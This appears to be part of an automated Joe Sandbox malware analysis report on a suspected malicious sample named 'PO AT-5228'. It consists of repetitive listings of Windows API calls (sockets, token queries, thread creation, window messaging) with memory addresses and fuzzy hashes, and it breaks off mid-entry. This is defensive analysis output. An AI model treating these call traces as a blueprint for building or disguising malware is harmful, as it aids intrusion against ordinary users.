                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        • Opcode ID: 592fdfa4b5db87e99072f1733e8c5f341f7abacfa41b7657c2bb76930eb53e57
                                                                                        • Instruction ID: 21dccd8436979630fc6dbbdb64ab5375f4e07c8ca0d5a26159f93117421ae0b6
                                                                                        • Opcode Fuzzy Hash: 592fdfa4b5db87e99072f1733e8c5f341f7abacfa41b7657c2bb76930eb53e57
                                                                                        • Instruction Fuzzy Hash: 6231DF71904259EFDF04CFA8EE8DA9E3BB5EB04315F104269F921AB2D1C7B09914DB91
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00B9DBD7
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B9DBF4
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B9DC2C
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B9DC52
                                                                                        • _wcsstr.LIBCMT ref: 00B9DC5C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 3902887630-0
                                                                                        • Opcode ID: 3dc9a70af4a64db12e2593d93140864ef6f6a6e9c792029adb4efdb82ae8f6ed
                                                                                        • Instruction ID: f8ba9ee636c2ff8ce19f55ede64e959848ebc1e7ee9db728fa7f2283d3331594
                                                                                        • Opcode Fuzzy Hash: 3dc9a70af4a64db12e2593d93140864ef6f6a6e9c792029adb4efdb82ae8f6ed
                                                                                        • Instruction Fuzzy Hash: 9D21BE72204244BBEF159B2ADC89E7A7BE9DF45760B1080B9F8099A191EAA19841D6A0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B9BC90
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B9BCC2
                                                                                        • __itow.LIBCMT ref: 00B9BCDA
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B9BD00
                                                                                        • __itow.LIBCMT ref: 00B9BD11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: 92232a7ee691b52e669e5716b2b25fed1d1cd465be63f4b15608398c195a7c2f
                                                                                        • Instruction ID: a356dd3b6e80e9e0d5b738b4e2000c9692e771f07c59fa333b236c7a475e5e55
                                                                                        • Opcode Fuzzy Hash: 92232a7ee691b52e669e5716b2b25fed1d1cd465be63f4b15608398c195a7c2f
                                                                                        • Instruction Fuzzy Hash: 1221C6356002187BDF20AA699D86FEE7BE9EF5A710F1014B4F905EB181DB708D4587E1
                                                                                        APIs
                                                                                          • Part of subcall function 00B650E6: _wcsncpy.LIBCMT ref: 00B650FA
                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,00BA60C3), ref: 00BA6369
                                                                                        • GetLastError.KERNEL32(?,?,?,00BA60C3), ref: 00BA6374
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00BA60C3), ref: 00BA6388
                                                                                        • _wcsrchr.LIBCMT ref: 00BA63AA
                                                                                          • Part of subcall function 00BA6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00BA60C3), ref: 00BA63E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                        • String ID:
                                                                                        • API String ID: 3633006590-0
                                                                                        • Opcode ID: bce063501c6f771eabd574d13c5f5064427e7600b2316a3ca6d7c498e6fb5124
                                                                                        • Instruction ID: f48d91948d7c3d5d2a254cbd5b6b18a14a17918c53674b41815aeb5fbad42062
                                                                                        • Opcode Fuzzy Hash: bce063501c6f771eabd574d13c5f5064427e7600b2316a3ca6d7c498e6fb5124
                                                                                        • Instruction Fuzzy Hash: 832108715082158ADF15AB7C9C92FEE23ECEF17360F1844E9F115D70D0EFA0D9868A59
                                                                                        APIs
                                                                                          • Part of subcall function 00BBA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00BBA84E
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00BB8BD3
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8BE2
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00BB8BFE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 3701255441-0
                                                                                        • Opcode ID: 75eb2651d94274730802e4f432ae34940836f4ad1837616ba44480c318bba1ee
                                                                                        • Instruction ID: 8591f2c39309c4bc91a74c46df8aa57385b95a4e9a4eeea829a9f84a0273ef45
                                                                                        • Opcode Fuzzy Hash: 75eb2651d94274730802e4f432ae34940836f4ad1837616ba44480c318bba1ee
                                                                                        • Instruction Fuzzy Hash: FC218E712002149FDB10AF68CD85BBE77EDEF48710F048499F916AB292CFB4EC018B51
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 00BB8441
                                                                                        • GetForegroundWindow.USER32 ref: 00BB8458
                                                                                        • GetDC.USER32(00000000), ref: 00BB8494
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00BB84A0
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00BB84DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: e5f22667573da60daaccc183715e6b86180134be17db32c58a161ad0e45c9f0d
                                                                                        • Instruction ID: bede609e06c8f2f33eb142f8fcbccb37ebc2f6029d7c7e1170600c20b1051f43
                                                                                        • Opcode Fuzzy Hash: e5f22667573da60daaccc183715e6b86180134be17db32c58a161ad0e45c9f0d
                                                                                        • Instruction Fuzzy Hash: 90215475A00204AFD710DFA4D995AAEB7E9EF48301F0488B9E8599B352DFB4ED44CB50
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B7AFE3
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00B7AFF2
                                                                                        • BeginPath.GDI32(?), ref: 00B7B009
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00B7B033
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: d4b9810c03e5e22248d4fb154b40ae483fcbef5bdee8c01a0b1828bb37df6758
                                                                                        • Instruction ID: fb9cae7a493d8fbe21058950a27c020f9a2ccbc1932faeb9b79dfbf453c51e2b
                                                                                        • Opcode Fuzzy Hash: d4b9810c03e5e22248d4fb154b40ae483fcbef5bdee8c01a0b1828bb37df6758
                                                                                        • Instruction Fuzzy Hash: 4A217475810349EFDB21DF55EC84F9E7BA9F720355F18825AF8359A5A0D3704842CF91
                                                                                        APIs
                                                                                        • __calloc_crt.LIBCMT ref: 00B821A9
                                                                                        • CreateThread.KERNEL32(?,?,00B822DF,00000000,?,?), ref: 00B821ED
                                                                                        • GetLastError.KERNEL32 ref: 00B821F7
                                                                                        • _free.LIBCMT ref: 00B82200
                                                                                        • __dosmaperr.LIBCMT ref: 00B8220B
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                        • String ID:
                                                                                        • API String ID: 2664167353-0
                                                                                        • Opcode ID: 36d39cad8732b4024b8ecdb4b54b1f9b1e5831f325e7a14780515aea77e83f97
                                                                                        • Instruction ID: ffa1eab08c19c6cc3af6d2c6629a8950db71a4178be91a908845e7eb7eb829f3
                                                                                        • Opcode Fuzzy Hash: 36d39cad8732b4024b8ecdb4b54b1f9b1e5831f325e7a14780515aea77e83f97
                                                                                        • Instruction Fuzzy Hash: F611E132148346AFAB11BFA4DC41DAB3BD8EF04764B2004A9F9249B1B1EF71D811CBA0
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B9ABD7
                                                                                        • GetLastError.KERNEL32(?,00B9A69F,?,?,?), ref: 00B9ABE1
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00B9A69F,?,?,?), ref: 00B9ABF0
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00B9A69F,?,?,?), ref: 00B9ABF7
                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B9AC0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: 3690b934ffa42b5eafa680fc81033f90df5e49f8a9e9a6652c051350c2c9f745
                                                                                        • Instruction ID: 72267dc5ce53a5865d12a83ae88e5a7e68466148a1458c1478bb6908e74da59b
                                                                                        • Opcode Fuzzy Hash: 3690b934ffa42b5eafa680fc81033f90df5e49f8a9e9a6652c051350c2c9f745
                                                                                        • Instruction Fuzzy Hash: 3F011971200244BFDF104FA9DC88DAB3FBDEF8A7557104469F945DB260DAB19C40CBA1
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32 ref: 00B99ADC
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00B99AF7
                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00B99B05
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00B99B15
                                                                                        • CLSIDFromString.OLE32(?,?), ref: 00B99B21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: a4fb44b3247fd862e969ff9bdfeeb56655811aacc8798c419ecbf5379bc2c8bf
                                                                                        • Instruction ID: 8dd72cb62edee102be1bcc7b96cd39c718124765f07ab7de0346bb5bb16d3660
                                                                                        • Opcode Fuzzy Hash: a4fb44b3247fd862e969ff9bdfeeb56655811aacc8798c419ecbf5379bc2c8bf
                                                                                        • Instruction Fuzzy Hash: C8015676600218AFDB104F68EC84BAABBEDEF44752F148078F909DA210DBB4DD009BA0
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7A74
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BA7A82
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7A8A
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BA7A94
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: 1333f1fd3a81fb7c3136c16ada1497b0df0143b1a3958bf7b0a87fd82b0b65bd
                                                                                        • Instruction ID: 8c5dc1023c9c5c3ae5326a1e5277b51da7913c90db49556b20941b5ce8651749
                                                                                        • Opcode Fuzzy Hash: 1333f1fd3a81fb7c3136c16ada1497b0df0143b1a3958bf7b0a87fd82b0b65bd
                                                                                        • Instruction Fuzzy Hash: 6F012935D4C619EBCF00AFE4DC99ADDBBB8FF0A711F004595E502B6250DF70965087A1
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B9AADA
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AAE4
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AAF3
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AAFA
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AB10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 5fe81c6534405de653732ff6e659ae4289126c734f150e45b1587b9e31dd68e0
                                                                                        • Instruction ID: 09832c5fa0f003b89a7078ad1628e7be06e7113eff1fdd50e03b8401f3f0c234
                                                                                        • Opcode Fuzzy Hash: 5fe81c6534405de653732ff6e659ae4289126c734f150e45b1587b9e31dd68e0
                                                                                        • Instruction Fuzzy Hash: E3F062712002486FEB111FA4ECC8F673BADFF45754F004179F941DB190CAA09D01CBA1
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B9AA79
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B9AA83
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B9AA92
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B9AA99
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B9AAAF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 9c18b54a5cefc77413ba240c8ac4ffd2420bca00124c1cbd3ce9a594d94f982b
                                                                                        • Instruction ID: 88247364c940401b14c84186136af276dedab6770630b4c11027a1db2233ba1c
                                                                                        • Opcode Fuzzy Hash: 9c18b54a5cefc77413ba240c8ac4ffd2420bca00124c1cbd3ce9a594d94f982b
                                                                                        • Instruction Fuzzy Hash: 94F04971200244AFEB115FA5AC89EAB3BACFF4A754F040569F941DB1A0DAA09C41CAA2
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00B9EC94
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B9ECAB
                                                                                        • MessageBeep.USER32(00000000), ref: 00B9ECC3
                                                                                        • KillTimer.USER32(?,0000040A), ref: 00B9ECDF
                                                                                        • EndDialog.USER32(?,00000001), ref: 00B9ECF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: 6cd6f6c1da28284a54c357567e24345904749870e9be9c3b147e97bd679a0426
                                                                                        • Instruction ID: 17c3a21a70de0e3fab22d1dca6d88949a7909b53d3f9fd45432256514e48784f
                                                                                        • Opcode Fuzzy Hash: 6cd6f6c1da28284a54c357567e24345904749870e9be9c3b147e97bd679a0426
                                                                                        • Instruction Fuzzy Hash: C5018130500744ABEF349B50DE8EB967BF8FB10705F0009A9B593AA4E0DBF4EA44CB40
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 00B7B0BA
                                                                                        • StrokeAndFillPath.GDI32(?,?,00BDE680,00000000,?,?,?), ref: 00B7B0D6
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00B7B0E9
                                                                                        • DeleteObject.GDI32 ref: 00B7B0FC
                                                                                        • StrokePath.GDI32(?), ref: 00B7B117
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: a46a8cd5b5e39ab2faa6b64a71349578ddcf6f889accb24db62cdaafb910a439
                                                                                        • Instruction ID: f4c0873b3c7b0c6b877b9a51d720cb33d3720013d6969af3c2467acded9f2453
                                                                                        • Opcode Fuzzy Hash: a46a8cd5b5e39ab2faa6b64a71349578ddcf6f889accb24db62cdaafb910a439
                                                                                        • Instruction Fuzzy Hash: A2F01934020248EFCB219F65EC4DB5C3BA5E720362F0C8355F829998F1CB718956DF50
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00BAF2DA
                                                                                        • CoCreateInstance.OLE32(00BEDA7C,00000000,00000001,00BED8EC,?), ref: 00BAF2F2
                                                                                        • CoUninitialize.OLE32 ref: 00BAF555
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
